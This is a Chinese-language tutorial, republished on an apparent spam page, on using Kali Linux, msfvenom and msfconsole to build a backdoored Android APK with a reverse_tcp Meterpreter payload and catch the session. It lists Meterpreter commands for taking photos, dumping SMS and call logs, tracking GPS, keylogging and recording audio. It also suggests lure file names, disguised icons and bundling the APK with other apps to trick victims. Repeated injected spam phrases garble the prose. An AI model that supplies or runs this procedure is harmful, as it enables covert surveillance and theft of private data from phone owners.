首页 欧易交易所文章正文

【案例剖析】Kali Linux利用MSF入侵安卓手机过程

欧易交易所 2022年10月20日 06:57 212 Connor

网安教育

培养网络安全人才

技术交流、学习咨询

PART

01

什么是msf

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件定时换ip软件

MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中定时换ip软件。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作

目标靶机:模拟器逍遥 Android 7.1.2

软件:msfvenom、msfconsole(Kali系统内置)

PART

02

渗透流程

1.进入管理员模式

命令:sudo su

解释:不在管理员模式下运行可能会有权限不够的提示定时换ip软件,为了避免命令执行失败,在管理员下运行以下命令

展开全文

提示:执行命令之后输入Kali的密码定时换ip软件,密码是被隐藏的,直接输入然后回车即可

2.生成可执行木马文件

命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

实例:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk

解释:本地ip写自己Kali的IP地址定时换ip软件,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号定时换ip软件,如果端口号被占用那么文件会生成失败,换一个端口号就性

文件名可以随便写自己喜欢的名字定时换ip软件,比如写免费刷赞,可能更容易让目标主机上钩

这个就是Kali主机的IP地址

接下来运行命令生成木马

默认生成的文件在根目录下

把刚才生成的安卓后门放到目标靶机中去

3.运行msfconsole命令

命令:msfconsole

4.配置参数

(1)命令:use exploit/multi/handler(选择模块)

(2)命令:set payload android/meterpreter/reverse_tcp(选择攻击模块)

(3)命令:set LhOST 192.168.32.1(填写自己主机的IP地址)

(4)命令:set lport 5555(填写刚才生成文件时的端口号)

(5)命令:show options(查看设置参数)

(6)命令:exploit -z -j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令定时换ip软件,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行

详细攻击配置参数演示:

现在等待靶机打开APP就可以定时换ip软件

5.在靶机打开可执行文件

我们这里也可以把这个程序伪装一下定时换ip软件,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令:sessions(查看上钩的用户)

(2)命令:sessions -i 1(选择需要攻击的用户)

出现meterpreter定时换ip软件你就已经成功的入侵成功

PART

03

meterpreter入侵安卓手机命令

1.查看对方手机系统信息

命令:sysinfo

2.查看对方手机安装哪些app文件

命令:app_list

3.远程控制对方手机拍摄一张照片

命令:webcam_snap

4.远程控制对方手机开起视频聊天

命令:webcam_chat

5.实时查看对方手机的信息

命令:dump_sms

6.获取对方手机的通讯录

命令:dump_calllog

7.实时获取对方手机GPS定位

命令:geolocate

8.更多命令

还可以查看帮助文档定时换ip软件,命令help

1cmd指令:

2cat 读取文件内容到屏幕

3cd更改目录

4checksum 检索文件的校验和

5cp 将源复制到目标

6del 删除指定文件

7dir 列出文件(ls 的别名)

8下载 下载文件或目录

9编辑 编辑文件

10getlwd 打印本地工作目录

11getwd 打印工作目录

12lcd 更改本地工作目录

13lls 列出本地文件

14lpwd 打印本地工作目录

15ls 列出文件

16mkdir 创建目录

17mv 将源移动到目标

18pwd打印工作目录

19rm 删除指定文件

20rmdir 删除目录

21search 搜索文件

22show_mount 列出所有挂载点/逻辑驱动器

23upload 上传文件或目录

24pkill 按名称终止进程

1meterpreter命令:

2keyscan_start开始捕获击键(开始键盘记录)

3keyscan_dump转储按键缓冲(下载键盘记录)

4keyscan_stop停止捕获击键(停止键盘记录)

5record_micX秒从默认的麦克风 record_mic音频记录(音频录制)

6webcam_chat开始视频聊天(视频定时换ip软件,对方会有弹窗)

7webcam_list单摄像头(查看摄像头列表)

8webcam_snap采取快照从指定的摄像头(摄像头拍摄一张照片)

9webcam_stream播放视频流从指定的摄像头(开启摄像头监控)

10enumdesktops列出所有可访问的桌面和窗口站(窗体列表)

11getdesktop得到当前的 Meterpreter桌面

12reboot重新启动远程计算机

13shutdown关闭远程计算机

14shell放入系统命令 shell

15enumdesktops列出所有可访问的桌面和窗口站

16getdesktop获取当前的 meterpreter桌面

17idletime返回远程用户空闲的秒数

18keyboard_send发送击键

19keyevent发送按键事件

20keyscan_dump转储击键缓冲区

21keyscan_start开始捕获击键

22keyscan_stop停止捕获击键

23mouse发送鼠标事件

24screenshare实时观看远程用户桌面

25screenshot抓取交互式桌面的屏幕截图

26setdesktop更改 Meterpreters当前桌面

27uictl控制一些用户界面组件

28record_mic从默认麦克风录制音频 X秒

29webcam_chat开始视频聊天

30webcam_list列出网络摄像头

31webcam_snap从指定的网络摄像头拍摄快照

32webcam_stream播放来自指定网络摄像头的视频流

33play在目标系统上播放波形音频文件 ( .wav)

34getsystem尝试将您的权限提升到本地系统的权限

35execute-fnotepad打开记事本

把文件上传到靶机命令

把文件下载到主机命令

END

版权声明:本文为CSDN博主「HonkerG」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明定时换ip软件

版权声明:著作权归作者所有定时换ip软件。如有侵权请联系删除

开源聚合网安训练营

环境搭建

Python

学员专辑

信息收集

CNVD

安全求职

渗透实战

CVE

高薪揭秘

渗透测试工具

网络安全行业

神秘大礼包

基础教程

定时换ip软件我们贴心备至

用户答疑

QQ在线客服

加入社群

QQ+微信等着定时换ip软件

我就知道定时换ip软件你“在看”

标签: 定时换ip软件

发表评论

欧易app/欧易交易所-全球最专业的数字资产交易平台Copyright Your WebSite.Some Rights Reserved. 备案号:川ICP备66666666号